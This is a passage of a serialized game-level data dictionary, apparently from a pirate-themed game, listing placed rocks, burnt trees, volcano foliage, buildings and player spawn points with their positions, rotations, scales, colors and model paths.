Point3(540.56, 252.089, 196.704),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.300000011921, 0.300000011921, 0.300000011921, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_d'}},'1273181408.98akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-155.312, 22.737, 0.0),'Pos': Point3(274.569, 544.511, 209.855),'RenderEffect': False,'Scale': VBase3(2.031, 2.031, 2.031),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.77, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_tall'}},'1273181477.33akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-106.761, 8.007, -1.341),'Pos': Point3(-347.621, 378.845, 43.932),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}},'1273181519.3akelts': {'Type': 
'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(116.422, 0.0, 0.0),'Pos': Point3(312.509, 668.811, 11.085),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_d'}},'1273181555.27akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-61.123, 0.0, -87.341),'Pos': Point3(253.143, 553.582, 128.975),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_a'}},'1273181669.42akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(162.684, -4.417, 23.96),'Pos': Point3(-210.003, 471.1, 48.247),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_b'}},'1273271715.34akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273271715.34akelts0','GridPos': Point3(-635.985, 181.68, 39.626),'Holiday': '','Hpr': VBase3(-17.484, 0.0, 0.0),'Objects': {'1273271715.37akelts': {'Type': 'Door Locator Node','Name': 'door_locator','Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(0.816, -10.08, -0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-593.437, 197.627, 66.453),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/pir_m_bld_spn_houseK_destroyed','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273272701.96akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(105.744, 0.0, 0.0),'Pos': Point3(-432.408, -26.632, 71.14),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_b'}},'1273272741.85akelts': {'Type': 
'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(140.626, 0.0, 0.0),'Pos': Point3(-510.307, 67.175, 69.725),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_a'}},'1273272849.65akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(136.302, 0.0, 0.0),'Pos': Point3(-492.289, 30.705, 71.479),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_c'}},'1273509425.92akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-158.868, 0.0, 0.0),'Pos': Point3(-538.328, 209.621, 65.317),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.64, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}},'1273509449.95akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-169.549, 0.0, 0.0),'Pos': Point3(-252.845, 397.968, 45.508),'RenderEffect': False,'Scale': VBase3(3.382, 3.382, 3.382),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_g'}},'1273509490.64akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-147.763, 0.0, 0.0),'Pos': Point3(-620.87, 210.625, 64.91),'RenderEffect': False,'Scale': VBase3(3.382, 3.382, 3.382),'VisSize': '','Visual': {'Color': (0.58, 0.64, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_g'}},'1273509537.2akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-50.753, 0.0, 0.0),'Pos': Point3(-580.458, 92.751, 71.706),'RenderEffect': False,'Scale': VBase3(3.382, 3.382, 3.382),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_g'}},'1273509626.86akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': 
'','Hpr': VBase3(53.942, -14.145, 15.526),'Pos': Point3(-604.474, 261.311, 61.452),'RenderEffect': False,'Scale': VBase3(1.308, 1.308, 1.308),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}},'1273509669.45akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-10.375, -1.124, -3.369),'Pos': Point3(-503.393, 235.76, 66.517),'RenderEffect': False,'Scale': VBase3(1.308, 1.308, 1.0),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_k'}},'1273509745.23akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-539.012, 254.793, 65.526),'RenderEffect': False,'Scale': VBase3(0.321, 0.321, 0.321),'VisSize': '','Visual': {'Color': (0.699999988079071, 0.699999988079071, 0.699999988079071, 1.0),'Model': 'models/props/pir_m_prp_cav_column_large'}},'1273509836.28akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-12.173, -0.33, -178.469),'Pos': Point3(-571.3, 305.584, 102.017),'RenderEffect': False,'Scale': VBase3(4.427, 4.427, 4.427),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_j'}},'1273510014.34akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(22.644, 0.0, 0.0),'Pos': Point3(-443.315, 228.732, 64.008),'RenderEffect': False,'Scale': VBase3(0.844, 0.844, 0.844),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}},'1273510138.33akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(230.387, 6.56, 48.587),'Pos': Point3(-500.062, 275.009, 84.439),'RenderEffect': False,'Scale': VBase3(0.6, 0.6, 0.6),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_b'}},'1273510275.8akelts': {'Type': 'Cave_Props','DisableCollision': 
True,'Holiday': '','Hpr': VBase3(0.0, -15.306, 0.0),'Pos': Point3(-545.445, 307.281, 49.766),'RenderEffect': False,'Scale': VBase3(1.297, 1.297, 1.297),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_tall'}},'1273510409.94akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273510409.94akelts0','Holiday': '','Hpr': VBase3(-99.705, 7.418, -2.67),'Pos': Point3(-257.981, 463.691, 43.946),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.40000000596, 0.40000000596, 0.40000000596, 1.0),'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/shanty_leanto_B','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273510458.75akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273510458.75akelts0','Holiday': '','Hpr': VBase3(57.711, -1.184, 5.748),'Pos': Point3(-309.58, 447.803, 42.05),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/burned_gate','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273510582.34akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-163.007, -1.321, -1.919),'Pos': Point3(139.559, 593.442, 13.643),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}},'1273510832.52akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-146.69, -1.814, -2.791),'Pos': Point3(-243.779, 696.96, -5.298),'RenderEffect': False,'Scale': VBase3(1.336, 1.336, 1.336),'VisSize': '','Visual': {'Color': (0.541, 0.717, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}},'1273510871.31akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(34.846, 1.888, 2.741),'Pos': Point3(-308.15, 637.321, -3.425),'RenderEffect': 
False,'Scale': VBase3(1.336, 1.336, 1.336),'VisSize': '','Visual': {'Color': (0.541, 0.717, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_b'}},'1273510959.8akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(10.788, -7.205, -6.657),'Pos': Point3(42.837, 836.863, 0.0),'RenderEffect': False,'Scale': VBase3(2.056, 2.974, 2.056),'VisSize': '','Visual': {'Color': (0.498, 0.712, 0.661, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_d'}},'1273511060.0akelts': {'Type': 'Player Spawn Node','Hpr': VBase3(95.336, 0.0, 0.0),'Index': -1,'Pos': Point3(387.886, -90.35, 14.807),'Scale': VBase3(1.0, 1.0, 1.0),'Spawnables': 'All','VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/misc/smiley'}},'1273511068.05akelts': {'Type': 'Player Spawn Node','Hpr': VBase3(174.323, 0.0, 0.0),'Index': -1,'Pos': Point3(366.891, 50.43, 0.536),'Scale': VBase3(1.0, 1.0, 1.0),'Spawnables': 'All','VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/misc/smiley'}},'1273511082.69akelts': {'Type': 'Player Spawn Node','Hpr': VBase3(138.302, 0.0, 0.0),'Index': -1,'Pos': Point3(322.793, -53.481, 14.349),'Scale': VBase3(1.0, 1.0, 1.0),'Spawnables': 'All','VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/misc/smiley'}},'1273511091.59akelts': {'Type': 'Player Spawn Node','Hpr': VBase3(128.533, 0.0, 0.0),'Index': -1,'Pos': Point3(370.997, -60.643, 13.381),'Scale': VBase3(1.0, 1.0, 1.0),'Spawnables': 'All','VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/misc/smiley'}},'1273511149.67akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-142.343, -1.644, 3.422),'Pos': Point3(-141.011, -244.179, 107.426),'RenderEffect': False,'Scale': VBase3(2.721, 2.721, 3.141),'VisSize': '','Visual': {'Color': (0.416, 0.469, 0.548, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_g'}},'1273511175.94akelts': {'Type': 'Burnt_Props','DisableCollision': 
False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(-197.3, -170.54, 108.54),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/vegetation/gen_tree_trunk_only_tall_burnt'}},'1273511189.3akelts': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(-292.481, -119.623, 107.72),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/vegetation/gen_tree_trunk_only_tall_burnt'}},'1273511201.41akelts': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(-489.6, 96.598, 72.291),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/vegetation/gen_tree_trunk_only_tall_burnt'}},'1273511206.09akelts': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(-405.54, 222.923, 64.126),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/vegetation/gen_tree_trunk_only_tall_burnt'}},'1273511211.73akelts': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(-566.361, 183.918, 68.078),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/vegetation/gen_tree_trunk_only_tall_burnt'}},'1273511217.41akelts': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(-412.268, 78.869, 69.823),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/vegetation/gen_tree_trunk_only_tall_burnt'}},'1273511251.84akelts': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(-388.058, 42.587, 70.898),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 
1.0),'Model': 'models/vegetation/gen_tree_trunk_only_tall_burnt'}},'1273511296.48akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-271.959, -262.049, 117.347),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_c'}},'1273511387.89akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-106.926, -97.084, 103.938),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_c'}},'1273511391.06akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-77.59, -168.754, 105.038),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_c'}},'1273511394.03akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-188.117, -100.273, 106.406),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_c'}},'1273511398.52akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-249.059, 58.677, 65.176),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_c'}},'1273511402.3akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(-170.017, 0.0, 0.0),'Pos': Point3(-549.097, 97.096, 73.37),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_c'}},'1273511406.09akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(124.472, 0.0, 0.0),'Pos': Point3(-591.184, 210.272, 66.446),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 
'','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_c'}},'1273511407.95akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-624.781, 180.905, 65.95),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_a'}},'1273511411.66akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(-75.755, 0.0, 0.0),'Pos': Point3(-326.683, 216.392, 61.061),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_a'}},'1273511413.02akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-260.402, 159.359, 65.741),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_d'}},'1273511417.69akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(3.51, -76.858, 91.226),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_c'}},'1273511420.97akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(237.674, -55.371, 28.356),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_c'}},'1273511426.34akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(72.264, 0.0, 0.0),'Pos': Point3(-318.021, 392.071, 46.568),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_c'}},'1273511428.14akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-230.468, 480.694, 47.454),'Scale': VBase3(1.0, 
1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_a'}},'1273511429.44akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-272.579, 397.308, 48.094),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_d'}},'1273511435.56akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(-157.361, 0.0, 0.0),'Pos': Point3(-384.429, 385.792, 44.531),'Scale': VBase3(0.721, 0.721, 0.721),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_a'}},'1273511440.19akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-519.813, 442.984, 38.58),'Scale': VBase3(0.738, 0.738, 0.738),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_c'}},'1273511444.73akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(95.585, 600.209, 16.561),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_a'}},'1273511447.59akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(-179.378, 0.0, 0.0),'Pos': Point3(291.432, 642.696, 23.133),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_c'}},'1273511541.06akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(138.868, 0.976, 4.412),'Objects': {'1273620739.14akelts': {'Type': 'Volcano','DisableCollision': False,'GridPos': Point3(-222.495, 139.547, 64.744),'Holiday': '','Hpr': VBase3(-138.991, 3.635, 2.686),'Pos': Point3(-6.176, -1.234, -0.009),'Scale': VBase3(0.193, 0.193, 0.193),'VisSize': '','Visual': {'Model': 
'models/props/pir_m_prp_vol_bush_a'}}},'Pos': Point3(-275.643, 169.902, 60.405),'RenderEffect': False,'Scale': VBase3(9.742, 9.742, 9.742),'VisSize': '','Visual': {'Color': (0.369, 0.416, 0.486, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_j'}},'1273511573.75akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-174.119, 3.894, 2.294),'Pos': Point3(-288.086, 42.861, 52.107),'RenderEffect': False,'Scale': VBase3(2.674, 2.674, 2.674),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_c'}},'1273511617.47akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-129.995, 4.392, -1.061),'Pos': Point3(-338.767, 30.541, 63.027),'RenderEffect': False,'Scale': VBase3(5.842, 5.842, 5.842),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_h'}},'1273513052.0akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(204.852, -67.799, 39.53),'Scale': VBase3(2.113, 2.113, 2.113),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273513061.67akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(208.173, -57.653, 37.782),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_b'}},'1273513065.72akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(199.347, -94.335, 42.245),'Scale': VBase3(1.648, 1.648, 1.648),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273513068.89akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(236.614, -125.458, 38.97),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273513073.16akelts': {'Type': 
'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(277.911, -123.549, 31.843),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_b'}},'1273513075.61akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(242.661, -57.771, 27.195),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273513080.05akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(256.46, -42.096, 20.764),'Scale': VBase3(1.961, 1.961, 1.961),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273513161.17akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(149.737, 2.946, -5.903),'Pos': Point3(242.828, -130.646, 37.256),'RenderEffect': False,'Scale': VBase3(2.622, 2.622, 2.622),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_i'}},'1273513778.33akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(251.915, -122.755, 35.992),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273513803.31akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(43.789, 16.73, 18.441),'Pos': Point3(232.908, -48.767, 30.419),'RenderEffect': False,'Scale': VBase3(2.622, 2.622, 2.622),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_j'}},'1273617351.03akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Objects': {'1273618307.91akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(55.008, -7.754, 
0.267),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273618319.39akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-470.558, 214.474, 68.916),'Holiday': '','Hpr': VBase3(32.73, 0.0, 0.0),'Pos': Point3(11.147, -4.92, 3.684),'Scale': VBase3(1.613, 1.613, 1.613),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}}},'Pos': Point3(-481.705, 219.394, 65.232),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.64, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_flat'}},'1273617465.25akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-68.421, 4.01, -12.814),'Pos': Point3(-212.56, 36.499, 75.17),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_flat'}},'1273617575.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(104.108, 2.527, -29.301),'Pos': Point3(-791.795, 60.372, 10.262),'RenderEffect': False,'Scale': VBase3(1.24, 1.24, 1.24),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_flat'}},'1273617786.13akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(0.0, 29.307, 0.0),'Pos': Point3(-814.066, 117.103, 27.965),'RenderEffect': False,'Scale': VBase3(1.229, 1.229, 1.229),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_g'}},'1273618116.92akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(61.255, -4.938, 9.959),'Pos': Point3(329.372, -119.853, 20.158),'RenderEffect': False,'Scale': VBase3(4.179, 4.179, 4.179),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_l'}},'1273618142.88akelts': {'Type': 
